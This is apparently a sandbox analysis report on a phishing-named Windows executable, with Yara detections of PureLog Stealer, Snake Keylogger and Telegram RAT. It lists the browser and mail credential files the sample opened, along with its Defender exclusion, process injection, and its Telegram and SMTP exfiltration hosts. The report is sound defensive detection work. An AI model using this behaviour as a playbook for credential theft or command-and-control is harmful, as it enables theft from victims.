                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeQueries volume information: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.2a986a8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.68c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.2b18834.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.68c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.2a986a8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.2b18834.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.28f6afc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.2876970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1636139946.00000000068C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1660117333.0000000002849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1632148313.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATION REQUIRED_Enatel s.r.l..bat.exe PID: 5748, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1532, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vTAuFgZcVE.exe PID: 6752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3760, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATION REQUIRED_Enatel s.r.l..bat.exe PID: 5748, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1532, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vTAuFgZcVE.exe PID: 6752, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATION REQUIRED_Enatel s.r.l..bat.exe PID: 5748, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1532, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vTAuFgZcVE.exe PID: 6752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3760, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.2a986a8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.68c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.2b18834.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.68c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.2a986a8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.2b18834.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.28f6afc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.2876970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1636139946.00000000068C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1660117333.0000000002849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1632148313.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATION REQUIRED_Enatel s.r.l..bat.exe PID: 5748, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1532, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vTAuFgZcVE.exe PID: 6752, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3760, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATION REQUIRED_Enatel s.r.l..bat.exe PID: 5748, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 1532, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vTAuFgZcVE.exe PID: 6752, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Scheduled Task/Job                  		311
                  Process Injection                  		3
                  Obfuscated Files or Information                  		LSASS Memory13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  Scheduled Task/Job                  		2
                  Software Packing                  		Security Account Manager11
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Timestomp                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets31
                  Virtualization/Sandbox Evasion                  		SSHKeylogging3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input Capture24
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                  Process Injection                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589989 Sample: QUOTATION REQUIRED_Enatel s... Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 50 reallyfreegeoip.org 2->50 52 api.telegram.org 2->52 54 4 other IPs or domains 2->54 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 66 14 other signatures 2->66 8 QUOTATION REQUIRED_Enatel s.r.l..bat.exe 7 2->8         started        12 vTAuFgZcVE.exe 5 2->12         started        signatures3 62 Tries to detect the country of the analysis system (by using the IP) 50->62 64 Uses the Telegram API (likely for C&C communication) 52->64 process4 file5 34 C:\Users\user\AppData\...\vTAuFgZcVE.exe, PE32 8->34 dropped 36 C:\Users\...\vTAuFgZcVE.exe:Zone.Identifier, ASCII 8->36 dropped 38 C:\Users\user\AppData\Local\...\tmp9C5C.tmp, XML 8->38 dropped 40 QUOTATION REQUIRED... s.r.l..bat.exe.log, ASCII 8->40 dropped 68 Writes to foreign memory regions 8->68 70 Allocates memory in foreign processes 8->70 72 Adds a directory exclusion to Windows Defender 8->72 14 powershell.exe 23 8->14         started        17 vbc.exe 15 2 8->17         started        20 schtasks.exe 1 8->20         started        74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 78 Injects a PE file into a foreign processes 12->78 22 vbc.exe 12->22         started        24 schtasks.exe 1 12->24         started        signatures6 process7 dnsIp8 80 Loading BitLocker PowerShell Module 14->80 26 WmiPrvSE.exe 14->26         started        28 conhost.exe 14->28         started        42 checkip.dyndns.com 132.226.8.169, 49709, 49712, 49717 UTMEMUS United States 17->42 44 api.telegram.org 149.154.167.220, 443, 49749, 49751 TELEGRAMRU United Kingdom 17->44 48 2 other IPs or domains 17->48 30 conhost.exe 20->30         started        46 208.91.198.143, 587, 60445 PUBLIC-DOMAIN-REGISTRYUS United States 22->46 82 Tries to steal Mail credentials (via file / registry access) 22->82 84 Tries to harvest and steal browser information (history, passwords, etc) 22->84 32 conhost.exe 24->32         started        signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  QUOTATION REQUIRED_Enatel s.r.l..bat.exe39%ReversingLabs
                  QUOTATION REQUIRED_Enatel s.r.l..bat.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe39%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://us2.smtp.mailhostbox.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  us2.smtp.mailhostbox.com
                  		208.91.199.223
